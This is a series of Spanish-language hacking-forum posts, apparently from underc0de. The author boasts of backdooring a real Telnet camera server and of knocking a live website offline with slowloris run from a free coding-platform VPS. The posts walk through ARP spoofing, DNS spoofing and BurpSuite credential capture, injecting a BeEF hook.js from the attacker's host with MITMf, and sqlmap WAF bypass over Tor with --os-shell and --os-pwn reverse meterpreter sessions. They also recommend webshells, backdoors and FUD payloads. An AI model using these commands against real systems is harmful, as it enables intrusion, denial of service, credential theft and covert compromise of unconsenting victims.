en mi caso yo hace 10 días atrás hice una explotación por telnet a un servidor de cámaras las cuales pueden ver en la siguiente imagen:



En mi caso yo explote un servidor Telnet, con el puerto 23 y deje un backdoor dentro, por seguridad solo muestro el panel de acceso ARRIS.



en mi caso encontré una IP relacionado a una web la cual fue : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, entonces si uno desea auditar ese sistema web con un ataque de fuerza bruta puede hacerlo con la herramienta "BruteX"

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Código: php
root@kali:~/BruteX# ./brutex bembos.com.pe






Espero les aya agradado este POST', saludos para Antrax, Mago Astral, Gabriela, Snifer y todos los compañeros  8)
#33


Saludos fieles Hermanos de underc0de en esta oportunidad, tengo algo que les encantara hace momentos me enviaron un vídeo de algunos Rat Kids, que utilizaban servicios de programación en linea todos ellos subían archivos escritos en perl  solamente para hacer un flooder enviando paquetes al puerto  UDP 80, obteniendo la IP de sus victimas, mediante la tecnica de IP resolver Skype, dejare algunos servicios online:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

en mi caso tengo uno privado con los módulos completos, hace meses lo liberaron un foro carder en fin, seguramente ya la liberaron, en fin esto no es el tema que tocare,  es el método de los niños rata que doy como "ejemplo" de lo que solamente hacen con eso.



Educando a los rat kids


Estuve observando ese vídeo y como le dije el método de la terminal ya tiene tiempo que se ejecutada dichos procesos pero hoy en día los niños ratas queman todo, al nosotros crear una cuenta en una plataforma de desarrollo de programación, los servidores añaden maquinas virtuales  que otorgan a cada usuario por defauld en su dedicado (VPS), que en su mayoría tienen privilegios ROOT, en este articulo aprenderemos aprovecharnos de esto y penetrar el sistema de diferentes maneras jugando al crazy code, uno de los servicios que a sido tan quemado, pero aun funciona para hacer algunas practicas de testeo de banda ancha con herramientas que añadidas  a un vps, podría colapsar plataformas web con buena banda ancha, el dominio es el siguiente:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



como en todo servicio enfocados a estas plataformas siempre nos pedirá que nos registremos para poder acceder al servicio correctamente, una ves añadido  lo siguiente, les pedirá que añaden el código de activación procederemos a entrar a la plataforma, pero siempre se creara nuestra "Maquina virtual", para entrar a nuestra propia consola.



una ves que se cree nos arrojara a la plataforma del sistema:



las personas que han manejado o manejan sistema linux, puede observar que no solamente añadimos código de programación, si no que al ver la terminal con nuestro nombre de usuario la curiosidad mato esta ves al sistema jaja.







lo que haré en esta oportunidad sera darle una clase de como hacer una verdadera denegación de servicio, este es el vídeo de un niño rata:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

si vieron el vídeo, creo que ustedes como personas con conocimiento podrán observar porque deseo educar a estos jóvenes con mala orientación, aunque por algo se empieza entonces que sigan su camino en todo este tiempo, mis deseos es que aprendan de la forma correcta.

lo que haré sera añadir el código del denegador de servicios por excelencia slowloris,  añadiremos la source en un nuevo archivo y lo guardaremos.

source:
Código: php

https://ghostbin.com/paste/hvqz3


Post que elabore hace años:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

siguiente con lo nuestro, añadiremos el source a nuestro archivo creado en extensión .pl , mi archivo lo llame " No tienes permitido ver los links. Registrarse o Entrar a mi cuenta "



como podemos observar el archivo esta en el servidor, entonces lo que haré sera ejecutar el slowloris con su comando por defauld para verificar las opciones que tiene.



obs, nos tiro un error en la cual nos dice que no esta instalado el repertorio SOCKET, la cual slowloris tiene como conexión de envío entonces como lo haremos? , es simple estamos en una terminal solamente ejecutamos apt-get install ( con el nombre del repertorio) , las cuales son los siguientes:
Código: php

sudo apt-get install libio-socket-inet6-perl

sudo apt-get install libio-socket-multicast-perl

sudo apt-get install libio-socket-ssl-perl


Una ves añadidos nuestra terminal nos arroja los datos de instalación por defecto aparecerán:



Una ves se instale todos ejecutaremos el ataque en mi caso añadí mis configuraciones del slowloris privadas mía por ende esta ves no podre dárselas y empezara a enviar peticiones grandes enviados por el dedicado:



Una prueba de concepto hice el ataque en la siguiente web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta , la cual le envió la web a un colega mio que me confirmo que estaba caído, para estar 100 % podemos verificarlos en:



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pero es solo denegación de servicio no es gran cosa, les enseñare otros métodos con algunas web que eh estado investigado con las cuales pueden practicar.



Como podemos observar la compatibilidad que escogí del servicio fue un lenguaje php, incorporado con MySQL, Apache 2.4 , de igual manera podemos ejecutar comandos en la terminal, lo que añadi fue un script añadiendo una cookie que sera mi puerta trasera para conectarme desde mi terminal de linux que es compatible con Backcokkie, la cual el articulo de uso lo pueden ver aquí mismo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

una ves añadido el source pasara a guardarlo y activaremos nuestro servidor, una ves completado ejecutaremos el backcookie:



de igual manera pueden utilizar otro backdoor como "Weevely" para comprometer todo el sistema, les dejare el post que elabore hace pocos dias.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

otro tipo de ataque también puede ser subir una webshell y tomar control de acceso de todos los servicios que conté el servidor mediante un Symlinking o Rooting, en mi caso solamente subiré la webshell del Team Albariam:



Deseas aprender a utilizar esta webshell y aprender symlinkg, tengo un vídeo de hace años de mi auditoria la cual los ayudara



de igual manera pueden conectar sus servicios mediante Putty, siempre y cuando en su plataforma tenga su SSH con sus credenciales para que se conecten al dedicado mismo, sin mas que decir espero les aya gustado este POST, un saludo !!

#34


Saludos mis hermanos de underc0de les enseñare un pequeño tutorial de como podemos interceptar nuestros ordenadores mediante BurpSuite y capturar todos los datos de los servicios que las victimas estén usando.

pero antes de utilizar BurpSuite, lo que haremos sera utilizar ettercap que es una herramienta que nos permite capturar los datos de peticiones de la red en general.

Lo primero que haremos sera abrir la terminal y procederemos ejecutar lo siguiente:

Código: php
root@kali:~# ettercap -i eth0 -T -q -M ARP ///192.168.1.1///




Porque añadí  la interface de red ? -i eth0 ,es simple porque la estoy corriendo desde una maquina virtual que supuesta mente esta conectada e identificada como una conexión de red LAN, si yo estuviera conectado en una red WLAN seria -i wlan0, para que se vayan guiando pueden ver lo siguiente:



como podemos observar a esto era lo que me refería hace momentos, bueno una ves entendido pasaremos ahora a hacer un DNS spoofing que es un ataque de recopilación de servicios DNS de los servidores que se conectaran nuestra red  como por ejemplo dominios,etc, y para mejorar nuestro ataque utilizaremos dnsspoof forja respuestas a consultas DNS dirección / puntero arbitrarias de la LAN interna. Esto es útil en pasar por los controles de acceso basados en el nombre de host o en la implementación de una variedad de controles de red eficientes.

para ser mas concreto sirve para interceptar las consultas de los clientes de LAN para que cuando se dirigían a un sitio web por ejemplo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta sea respondida con la dirección IP para web.internal.lan (10.10.10.1), enviando peticiones falsas y los datos reales nos lleguen a nosotros,la mejor parte es dnsspoof será única intercepción nombres de host que configurar el daemon que debe buscar todas las demás consultas van directamente a su servidor DNS interno como normal.

En este caso estoy utilizando la interface eth0 la cual añadiremos a dnsspoof de la siguiente manera:
Código: php

root@kali:~# dnsspoof -i eth0




Con todo lo siguiente ya tendremos las conexiones recibidas por todos los sistemas conectados, por ejemplo:



por ejemplo encontramos a un tipo viendo porno xD hahahahahha na es una prueba no se emocionan que no se liberara leaks de cuentas premium, de acuerdo a ello podemos observar que nuestra actual victima esta ejecutando el navegador Mozilla, lo que haremos sera abrir BurpSuite y procederemos ir a entrar a la pestaña Proxy  y entraremos a la sección opcións .

Luego de ello pasaremos a añadir 2 nuevas listas como por ejemplo fueron

    192.168.179.129:80
    192.168.179.129:443


al añadir nuestra IP y esos puertos vamos a capturar los datos de red directamente en el Burpsuite, ya que esos puertos son los que estarán en escucha para ettercap



Una ves configurado nuestro servidor de escucha, lo que haremos sera dirigirnos a "la pestañña" Intercept.



y le daremos en Intercept para proceder a capturar los datos de nuestra victima, en este caso la victima añadirá sus credenciales de usuario en la web porno :v



Una ves que nuestra victima aya ingreso sus datos, ya hemos capturado sus credenciales veamos que encontramos con BurpSuite



como vemos hemos capturado el parámetro "POST" , la cual nos arroja como resultado el texto plano de los datos que ingresamos en las credenciales de usuario.

POST /user/login/11/5502/14/ HTTP/1.1
Host: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Cookie: CAKEPHP=b87e0cb0837559254aea4595cc456a2c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
_method=POST&data%5BUser%5D%5Busername%5D=porno2014&data%5BUser%5D%5Bpassword%5D=dejalapaja


lo que nos interesa en este entonces es los datos de login las cuales fueron :
Código: php

User : porno2014 Password: dejalapaja


de igual manera podemos entrar a la siguiente pestaña para ver las peticiones DNS de las victimas.



de igual manera como pueden observar tambien bypasseamos las conexiones HSTS / que son las conexione seguras que piden un protocolo SSL



Bueno esto fue todo espero les aya gustado este POST, un saludo para todos los seguidores.

Happy Hacking!
#35


Main in the middle o hombre en el medio es un ataque en la cual nosotros estaremos en el medio entre los ordenadores y el rooter capturando el trafico de datos con una metodología que pasare a explicar sin tecnicismo en una imagen:



cuando una ordenador hace una petición a un servicio su procedimiento normal es que esta tiene que pasar al rooter y posteriormente al internet, en nuestro caso si la victima hace una petición a un servicio nosotros vamos a recibir los datos en texto plano recolectando datos de información en primer plano, el segundo envió seria al  rooter y luego al internet, en esta oportunidad voy a utilizar Ettercap la cual es una herramienta en código abierto que nos permitirá ejecutar el ataque.

Primer escenario Ettercap


En mi caso ejecutare la plataforma GUI, lo que haremos sera dirigimos a la primera pestaña que les aparecerá primero en el Ettercap daremos en "Sniff", luego de ello escogeremos nuestra interface de red, en mi caso es Eth0, automáticamente pasara a iniciar el servidor de snnifeo, luego nos dirigimos a la opción que parece en la imagen  entraremos a "Hosts" y luego procederá a hacer un análisis de rangos para ver las IP'S o ordenadores conectados ahora mismo, de igual manera escuchara a las entrantes conexiones entrantes en cualquier momento. 



Listado de red lo puedo ver en "Hosts" >> Hosts List



la IP de mi sistema de red es 192.168.179.129 , la de mi victima sera la primera que es 192.168.179.2  una ves identificado a quien haré el ataque procederemos a lanzar el ataque de la siguiente manera.



Luego de ello le daremos en aceptar, ya que estamos estableciendo una conexión entra nuestro sistema con la de la victima, luego de ello iremos a la opción "Mitm" y daremos en "ARP":



ahora daremos en primera opción "para establecer el sniffeo remoto.



al aceptar completamente ya tendríamos el envenenamiento ARP establecido, entonces lo que haré en mi caso sera utilizar driftnet, que es un capturador de imágenes remotas  de sistemas comprometidos en tiempo real, solamente añadimos nuestra interface en mi caso fue #Eth0

Código: php
 root@kali:~# driftnet -i eth0




Una ves establecido nuestro capturar, al momento que la victima entre a un servidor podemos capturar el trafico de imágenes,  un ejemplo mi victima esta en la siguiente web:



Nuestra victima ni siquiera sospechara nada, ya que hemos infectado la red por ende la explotación se basa en las conexiones de entrada y escucha, entonces pasamos a nuestro ordenador y vemos las imágenes capturadas:



Si desean capturar el trafico de datos en texto plano, les dejare un articulo en donde enseño el método:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Segundo escenario MITMF

Segundo escenario MITMF


MITMf tiene como objetivo proporcionar una ventanilla única para los ataques Man in the Middle y la red durante la actualización y la mejora de los ataques y técnicas existentes.

Originalmente construido para hacer frente a las deficiencias significativas de otras herramientas por ejemplo Ettercap, Mallory, ha sido re-escrito casi completamente desde cero para proporcionar un framework modular y fácilmente extensible que cualquiera puede utilizar para implementar su propio ataque MITM.

descarga:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Lo primero que haremos sera actualizar algunos repertorios que necesitara para ejecutar sus capacidades utilitarias.
Código: php

root@kali:~# apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev




Lo que haremos sera descargar el MITMF y proceder a instalar sus requerimientos para que pueda funcionar correctamente:
Código: php

root@kali:~# git clone https://github.com/byt3bl33d3r/MITMf
root@kali:~# cd MITMf && git submodule init && git submodule update --recursive
root@kali:~# pip install -r requirements.txt




Una ves completado todo eso, ya tendremos nuestra herramienta lista para ser usada pero antes que nada necesitaremos enfocarnos en una victima la cual sera la misma 192.168.179.2, pero antes de ello utilizaremos "BeEF" para crear nuestro servidor de infección y activarlo.
Para configuar BeFF y añadir los módulos de metasploit puede ver el siguiente articulo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



En este caso lo que haremos sera utilizar el script hook.js, ya que podemos inyectar este código malicioso en los navegadores en los servidores web que la victima entre sin que se de cuenta, para ello utilizaremos BeEF para enviarlo remotamente con el envenenamiento ARP

Código: php
root@kali:~# python mitmf.py --spoof --arp -i eth0 --gateway 192.168.179.2 --target 192.168.179.132 --inject --js-url http://192.168.179.129:3000/hook.js

-i identificamos el tipo interface en mi caso "eth0", --gateway es el servicio rooter y por ende --target la ip de la victima.



entonces ya tenemos listo nuestra conexión main in the middle para infectarlo directamente al momento que la victima entre a cualquier pagina web, en mi caso mi victima entro a una pagina de adultos "Nuevamente" jajaja.



al momento que la victima entre nosotros en primer plano tendremos los datos DNS:



Como vemos vemos los datos de la victima, la cual utiliza windows 7 conectado al navegador Firefox y vemos la URL donde se inyecto el código, otro plano abriremos el panel de BeFF y tendremos su sesión captura, con la cual podemos explotar a nuestra victima.



Aqui unos metodos de explotacion:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Atacando con metasploit:




En metasploit seria aprovechar el MITMF mediante el exploit de java hace poco tiempo nuevamente hay nuevos exploit para explotar nuevos complementos:

Módulos nuevos:





auxiliary/server/browser_autopwn2
exploit/multi/browser/adobe_flash_hacking_team_uaf
exploit/multi/browser/adobe_flash_nellymoser_bof
exploit/multi/browser/adobe_flash_net_connection_confusion
exploit/multi/browser/adobe_flash_opaque_background_uaf
exploit/multi/browser/adobe_flash_shader_drawing_fill
exploit/multi/browser/adobe_flash_shader_job_overflow

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

root@kali:~# python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta --spoof --arp -i eth0 --gateway 192.168.179.2 --target 192.168.179.132 --inject --js-url (añadiran el payload del exploit que les carge en metasploit)




de igual manera puedes añadir : payloads ejecutables para que lo descarge y ejecute para explotar al sistema, siempre y claro deben dejarlo FUD, aqui el post para hacer tu payload indetectable:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Diferentes técnicas para crear tus payload:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#36
Pentesting / Bypasseando WAF con SQLMAP & TAMPER
Mayo 23, 2016, 11:27:24 AM

Saludos mis fieles lectores estuve leyendo algunos mensajes de mis seguidores y me comentaban lo siguiente ¿Como Bypassear el WAF de los servidores web para ataques de inyección SQL? ya que no hay mucha información sobre que tipo de de insertacion que contienen cada tamper en sus payloads, me tomare la molestia de pasarlo a explicar.

¿Que es un WAF? 


WAF - Web Application Firewall (Aplicación de corta fuegos Web), es un servicio de filtros contra ataques de código malicioso como los conocidos "XSS" - Cross-Site-Scripting, "SQL inyección", "RFI" - Remote File Inclusión, "DoS" - Denegación de servicios, "DDoS" - Distribución de denegación de servicios, entre otros ataques detectados pasaran a ser bloqueados por este servicio de filtros.

Existen muchos, pero algunos conocidos y familiarizados con la mayoría de plataformas son:

ModSecurity
Naxsi-Nginx




¿Que es un Tamper?

Un Tamper es un aplicativo open source creado en python compatible con sqlmap, para las funciones de insertar payloads camuflados, mediante envíos de peticiones de sintaxis a la base de datos burlando algunas aplicaciones de protección web, como los conocidos "WAF"

La ubicación los tampers se encuentren en el siguiente directorio: /usr/share/sqlmap/tamper


Funciones y codificaciones de los Tamper mas utilizados



space2comment.py         - Sustituye un carácter de espacio >>  " ( ' ') ", con inserciones ' / ** /'

charencode.py                 - codifica todos los caracteres con numérico   44%20%54%20%

base64encode.py            - convierte todo los caracteres en codificación base64
'MScgQU5EIFNMRUVQKDUpIw=='

randomcomments.py     - Añade comentarios al azar mediante búsquedas de palabras MySQL
'I/**/N/**/SERT'

versionedkeywords.py   - Especifica cada palabra clave de versión de búsqueda MySQL
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR

space2randomblank.py - Sustituye carácter de espacio ('') con un carácter en blanco al azar 'SELECT%0Did%0DFROM%0Ausers'

modsecurityversioned.py ejecuta consulta completa con comentario versionado
'1 /*!30874AND 2>1*/--'

equaltolike.py - Reemplaza todas las apariciones de operador igual ('=') con el operador 'LIKE'
'SELECT * FROM users WHERE id LIKE 1'

randomcase.py - Reemplaza cada personaje de palabras clave con el valor de caso fortuito 'INseRt'


Ojo: cada tamper tiene como función única para uno o varios tipos de lenguajes de base de datos.

Si desean saber mas funciones de algunos Tamper's pueden verlo en los repertorios de cada uno en el siguiente enlace:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Burlando WAF mediante SQL inyección


En esta oportunidad escogí un servidor web como conejillo de indias para poder llevar acabo el servicio de ataque, en mi caso haré una inyección en el parámetro GET  vulnerable con los comandos básicos de sqlmap con el TOR.

[/code]
Código: php
sqlmap -u http://www.ejemplopaginaweb.com/galeria.php?categoria=2 --tor --check-tor --tor-port=9150 --tor-type=SOCKS5 --level=5 --risk=3 --random-agent




Si bien es cierto el testeo nos arroja que es "Inyectable", luego para nuestra mala suerte nos arroja que es un falso positivo, pero concatena sintaxis, en el parámetro categoría



Entonces al ejecutar el servidor de un falso positivo,me pide que ejecute el "--no-cast"para cargar los payload para el testeo de los nombres de las base se datos, muchos ya se hubieran rendido porque este proceso en su mayoría no es tan útil al momento de extraer las tablas o columnas de la base de datos.

Entonces observando que el servidor esta en MySQL puedo añadir el tamper space2comment, pero también puedo jugar con otro tamper añadiéndolo al testeo como charencode.

Código: php
root@kali:~# sqlmap -u http://www.ejemplopaginaweb.com/galeria.php?categoria=2 --tor --tor-port=9150 --tor-type=SOCKS5 --tamper="space2comment,charencode.py" --level=5 --risk=3 -v 3 --random-agent --dbs --no-cast 




vemos que nuestro testeo esta corriendo y vemos aviso del WAF, ya que hemos personalizado el TEST con un escaneo mas extenso gracias al servicio Verbose que le añadimos el rango 3,  -v 3 enviamos una petición carácter y numérica, entonces nuestro payload se esta ejecutando con perfección



Hemos burlado el WAF y por ende extraído las base de datos de dicho servidor, mientras hay otros tamper que son detectados por los corta fuegos, dándonos como mensaje lo siguiente:



es por eso que se deben interactuar con cada tamper para que trate de bypassear los diferentes tipos de WAF, para poder ejecutar las sentencias de ofuscación, recuerden que cada Tamper esta elaborad para cada tipo de estructura de lenguaje web, como jsp, asp, aspx, php.



Compatibilidad de los tamper con los tipos de estructuras de base de  datos:


MySQL


space2randomblank,
unionalltounion
unmagicquotes
versionedkeywords
versionedmorekeywords
xforwardedforbetween
bluecoat
charencode
charunicodeencode
concat2concatws
equaltolike
greatest
halfversionedmorekeywords
ifnull2ifisnull
space2morehash
space2mysqldash
space2plus
modsecurityversioned
modsecurityzeroversioned
multiplespaces
securesphere
space2comment
space2hash
nonrecursivereplacement
percentage
randomcase

MSSQL:
sp_password
space2comment
space2dash
space2mssqlblank
space2mysqldash
space2plus
space2randomblank
charencode
charunicodeencode
equaltolike
greatest
unionalltounion
unmagicquotes
multiplespaces
nonrecursivereplacement
percentage
randomcase
securesphere

MSAccess:
modsecurityversioned
modsecurityzeroversioned
equaltolike
greatest
halfversionedmorekeywords
nonrecursivereplacement
percentage
randomcase
securesphere
between
bluecoat
charencode
charunicodeencode
concat2concatws
space2comment
space2hash
space2morehash
space2mysqldash
space2plus
space2randomblank
unionalltounion
unmagicquotes
versionedkeywords
versionedmorekeywords
ifnull2ifisnull
multiplespaces

PostgreSQL:
xforwardedfor
space2comment
space2plus
space2randomblank
between
charencode
charunicodeencode
equaltolike
greatest
multiplespaces
nonrecursivereplacement
percentage
randomcase
securesphere
between


SQLite:
space2plus
unionalltounion
unmagicquotes
xforwardedfor
ifnull2ifisnull
randomcase
securesphere
space2comment
space2dashmmultiplespaces
nonrecursivereplacement
#37
Pentesting / Aprendiendo SQLMAP avanzado
Mayo 23, 2016, 10:55:49 AM


Saludos tíos en esta oportunidad vamos a aprender sobre la herramienta Sqlmap en su entorno Inicial y el avanzado
¿Que es el SQLMAP ?

El sqlmap es una herramienta en código abierto, la cual nos permite inyectar  una web automáticamente,y nos permite utilizar varias variables en sus ejecuciones de comandos.
Nuestros Primeros Pasos en el SQLMAP

Utilizare el Sistema Operativo Backtrack R3 /Linux.

Abriremos Nuestra Terminal y pondremos lo siguiente para entrar al directorio.

Código: php
cd /pentest/database/sqlmap


Lo que haremos ahora sera ejecutar el primer nivel de testeo del sqlmap en este caso el nivel 1, pondremos la url con el error de SQL  en este caso un parámetro GET

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


agregaremos una comilla al final  o adelante del numero, la cual nos  confirmara si es vulnerable a una sql inyección  botando el siguiente mensaje :

" You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '9'' at line 1 "

Como vemos esta es una forma de identificar dicho error para inyectarlo, buenos vayamos al grano  8)

Ejecutamos este código en la terminal :

Código: php
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --dbs


Una ves ejecutado el código, el sqlmap empezara a  Testear la web, una ves terminada  saldrán las base de datos que tenga la misma como vemos en la imagen.



Para Entrar a las base de datos y ver sus tablas pondremos el siguiente codigo

Código: php
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --D privacidaddb --tables 


Como vemos eh entrado a la base de datos "Privacidaddb"  nos voto las tablas y entre ellas columnas que tienen la información primordial de la web.



Ahora entraremos a la Tabla " usuarios " y  extraeremos todos los datos de un porrazo

Código: php
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --D privacidaddb -t usuarios --columns --dump




Esta es la manera típica de obtener datos paso por paso

Si deseamos tener todos los datos de las base de datos / tablas columnas y datos de la misma, pondremos  este codigo

Código: php
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --dump-all 




pero si deseamos tener la base de datos de la web relacionada a las conexiones de la misma base de datos afectaba pondremos el código

Código: php
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 -p id --current-db 




También es muy importante Proteger nuestra privacidad y sobre todo camuflar nuestra Inyección en los Logs del servidor alojado de la web, ya que cada ves que entramos a una web, se quedan grabados nuestras navegaciones, como nuestra IP / y sobre todo el tipo de conexión y petición que usamos , veremos un ejemplo para que se den cuenta.

Como vemos aqui me eh conectado mediante Internet explore  de una maquina virtual mediante el parametro GET :



Ahora me conectare nuevamente asiendo una Inyección SQL para ver como se ve la conexión  :



Como vemos en la imagen " nos dice que la conexión se inicio mediante : "sqlmap/1.0-dev-25eca9d (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)" como vimos detecta hasta el programa que  utilizamos, pero ojo lo que hize fue algo simple ya que solo utilice el codigo del sqlmap.py  -u url --dbs -D , ahora utilizare el código para dumpear las columnas de las tablas:



como vemos nos detecta de una manera mas textual la conexión que estamos relacionado, entonces el web master se daría cuenta que estamos inyectando su web, entonces vamos a camuflar nuestras conexiones

Pondremos este código :

Código: php
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 -D privacidaddb --tables --user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)"




Como vemos hemos camuflado nuestra conexión con un robot  de google la cual esta en todo momento vigente en las conecciones de inicio , y hemos puesto el inicio de origen en este caso " No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"

Luego de ello, vamos a utilizar un metodo de como obtener datos del usuario de la web :

Código: php
sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9  --current-user 




en este otro método vamos a comprobar si el usuario obtenido es correcto al de la base de datos.

Código: php
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --is-dba --current-db




Debemos tener en cuenta que también podemos ver los privilegios de administradores por medio de este tipo de inyección, pondremos el siguiente código :

Código: php
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --privileges




Como vimos obtuvimos datos de los privilegios activados .

ahora aprenderemos el mismo metodo, pero en esta ves obtendremos todos los usuarios de DBS mediante este comando:

Código: php
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --users




como vemos esta alojado como en el sistema como ROOT y corre en un Gnu/Linux ahora viene lo interesante , Obtener las contraseñas de los usuarios de las dbs, utilizaremos este comando

Código: php
./sqlmap.py -u ./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --password




Como vemos nos sale este mensaje, pero porque ?, porque las contraseñas de los registros en las base de datos, automáticamente de codifican en "Hash" como son el "MD5" , que es la codificación mas conocida, bueno esta alerta " si deseamos poner ["Y" , "N", "Q"] , la Letra "Y" nos quiere decir que si deseamos utilizar un ataque de fuerza Bruta mediante el sqlmap, para descifrar la hash , el  " N " , Sirve para negar el proceso de fuerza bruta y obtener solamente la "hash" y el comando " Q " nos permite terminar el proceso hasta ese momento , Yo Pondre la Opcion "Q" y saldra 3 opciones yo , escogere el diccionario 1 /defauld y en momentos votara lo siguiente:



Como vimos nos muestra la contraseña ya crackeada la cual fue " comandos " y también al usuario que lo pertenece que es " root "

También debemos tener en cuenta que podemos utilizar un tipo de búsqueda mas completa y rápida, con la opción búsqueda, la cual nos facilitara el proceso de búsqueda, como " login " o " usuario / "contraseña" o "password ", en este proceso debemos tener en cuenta que debemos jugar con los nombres de búsquedas,para hallar las columnas aun mas rápido, pondremos este comando :

Código: php
./sqlmap.py -u http://localhost/test/SQL%20Injection/detalle.php?id=9 -C login --search 




como vemos nos sale dos opciones  la primera  "Defauld" nos permite tener una lista opcional de la búsqueda
la segunda opción, " nos permite tener una lista mas completa , entonces yo le dare " la primera opción " 1 y nos saldrá las columnas de las base de datos en general :



automáticamente después no saldrá esta opción que veremos en la imagen:



este proceso nos permitirá hacer un dump de las columnas  halladas en las DBS , entonces yo le pondré la opción : "a" que nos hará un dump en  general, y nos votara así:




si deseas tener un proxy en su testeo con el slqmap  , utilizaremos el " tor " primero debemos instalarlo en nuestro sistema operativo, una ves instalado  y configurado utilizaremos este comando .

Código: php
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --dbs --tor 



Yo solamente pongo el tor porque para mi es uno de los mas seguros, claro si sabes configurar bien el valida con el tor.

Herramientas del Sqlmap

Actualmente hemos utilizado el slqmap para obtener datos de una web, y para ser sinceros hemos obtenido los datos del  administrador , o simplemente no hemos obtenido datos, ya sea por un error en el testeo, o simplemente porque no había los datos de logeo , la cual necesitamos para nuestro " Deface " o para tener el  acceso general a la web entonces nos hemos rendido ante esos pequeños problemas  ahora dime te preguntaras sqlmap tendrá herramientas que me permitan otro tipo de proceso para subir archivos ? pues yo te diré que si esta es una herramienta poderosa que nos permite hacerlo vayamos a la acción tio  8)

Entramos al sqlmap y pondremos el siguiente código

Código: php
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --os-shell 




Como vemos en la imagen, nos muestra 4 tipos de extensiones web's en este caso, nosotros escogeremos el numero 3  ,porque nuestro upload estará basado el dicha programación, ya que es estándar en los servidores web , yo eligire el php y nuego de ello le damos enter y pondremos el discloure parch  ! yo puse el del inicio de la web, como vemos aqui, luego de ello nos voto! abajo 2 URL" donde nos indicia que el upload subio correctamente.



Entraremos al primer link:



tango down! pasamos a Subir nuestra shell y tenemos acceso total al sistema

Utilizar slqmap con Metasploit , mediante este proceso crearemos  un exploit  pasar a utilizar los payloads como  " Reverse_tcp" para  tener una sesión   reversa, subiendo nuestros "archivos infectados al servidor web" vamos a la acción ! Pondremos el siguiente codigo :

Código: php
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --os-pwn


Una ves ejecutado nos saldrá esta opción.



Ejecutaremos el primero , ya que vamos a utilizar una conexion de taza  transferencia de protocolos / TCP , con metasploit luego nos saldra las mismas opciones las cuales ejecutamos en la sección de arriba ,como subir un upload por sqlmap, usaremos el mismo procedimiento hasta que les salga estas opciones:



en esta sección no pide crear una shellcode para utilizar la conexión y nos arroja 5 opciones , entonces yo escogeré la opción " 2 " la cual es "Reverse_tcp" , con los  puertos por defecto  " entonces son saldrán 2 opciones y le daremos " Enter " una ves ello nos dirá:



Entonces le  pondré " 1 " ya que capturaremos las sesión meterpreter  y empezara el proceso ...........
luego de ello nos saldrá que ah sido creado nuestra sesión con el ejecutable



Luego de ello se abrirá  automáticamente el metasploit ejecutando los procesos de explotación y automáticamente iniciara la sesión



Como vemos hemos explotado la web , alojada en un servidor windows y tenemos el acceso total interesante . . . . . . . .
Bueno tíos esto fue todo, espero hallan aprendido estos códigos y formas de explotación  mediante el sqlmap , hasta la próxima
#38


Saludos hermanos de underc0de en esta oportunidad les traigo la herramienta llamada "Zaproxy" (Zed Attack Proxy), esta programada en Java la cual el año 2013 gano el top de la mejor herramienta de auditorias difundida por la grande organización de seguridad a nivel mundial OWASP.
Algunos la han llamado la hermana menor de BurpSuite : )

En esta oportunidad haré este POST en Windows, antes de aclarar zaproxy se encuentra en Kali Linux para los que deseen probarla.


Características:

Interceptacion Proxy 
Spiders tradicionales y AJAX
Escáner automatizado
Escáner pasivo
